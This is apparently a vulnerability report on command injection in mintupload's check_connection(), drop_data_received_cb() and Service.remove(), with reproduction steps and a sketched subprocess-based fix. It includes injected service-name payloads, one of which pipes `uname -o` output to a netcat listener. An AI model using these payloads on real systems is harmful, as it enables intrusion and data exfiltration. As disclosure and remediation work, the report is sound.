Vulnerability: Improper sanitation of service name leads to command injection in check_connection(), drop_data_received_cb() and Service.remove() #42

@1337kid

Overview

    def check_connection(self, widget, file):
        service = Service(file)
        os.system("mintupload \"" + service['name'] + "\" /usr/share/linuxmint/mintupload/mintupload.readme &")

Here, the service name is added without sanitizing it. By default mintupload doesn't allow a user to create a service with special characters but it's possible to modify the service name by changing it in ~/.linuxmint/mintUpload/services/service.

Consider a case where the service name starts with " and ends with #. By doing so, the argument in os.system becomes

    mintupload "" servicename #" /usr/share/linuxmint/mintupload/mintupload.readme &

Now, to inject a command replace servicename with & command here.

Example:

To display the output of uname -o via a netcat listener, change the service name to " & uname -o | nc 0.0.0.0 1234 #

Steps to reproduce

  • Create a service.
  • Modify the service name in ~/.linuxmint/mintUpload/services/service to " & command here #.
  • Open Mint Upload. Select the service and click on "Check connection".

Other functions

When the function drop_data_received_cb() is invoked by dropping a file, the command gets executed.
    def remove(self):
        os.system("rm '" + self.filename + "'")

In the case of Service.remove(), a command can be injected by renaming the service file to ' & command here #, so that the argument inside os.system() will become

    rm '' & command here #

Possible fix

Replacing os.system() with subprocess.run() can fix this issue.
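
A sketch of that fix, added here as an example and not taken from the issue or from the mintupload code base: it compares how many programs a shell would start for the string built in check_connection() with an argument-list call where the name stays a single argv element, and replaces the `rm` call with `os.remove()`. The function names, the sample name "My FTP" and the child Python process standing in for mintupload are assumptions, and `shlex` only approximates shell parsing.

```python
import os
import shlex
import subprocess
import sys

README = "/usr/share/linuxmint/mintupload/mintupload.readme"

def legacy_command(name):
    # The string the reported code hands to os.system(); built here, never run.
    return 'mintupload "' + name + '" ' + README + ' &'

def programs_run(command):
    # Approximate shell parsing with shlex: return the first word of each
    # simple command, i.e. every program the shell would start.
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    programs, at_start = [], True
    for tok in lexer:
        if tok and set(tok) <= set("&|;"):
            at_start = True          # control operator: a new command follows
        elif at_start:
            programs.append(tok)
            at_start = False
    return programs

def safe_argv(name, program="mintupload"):
    # No shell involved: the name is exactly one argv element.
    return [program, name, README]

def child_sees(name):
    # Stand-in for mintupload (assumption): a child Python that prints argv[1:].
    argv = safe_argv(name, program=sys.executable)
    argv[1:1] = ["-c", "import sys; print(repr(sys.argv[1:]))"]
    done = subprocess.run(argv, capture_output=True, text=True, check=True)
    return done.stdout.strip()

def remove_service_file(path):
    # Replaces os.system("rm '...'"): a direct unlink, the name is never parsed.
    os.remove(path)

if __name__ == "__main__":
    crafted = '" & command here #'   # name pattern from the report
    print(programs_run(legacy_command("My FTP")))   # constructed benign name
    print(programs_run(legacy_command(crafted)))
    print(child_sees(crafted))
```

In the application itself the call would be `subprocess.Popen(safe_argv(service['name']))`, which also covers the trailing `&` because `Popen` does not wait for the child.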
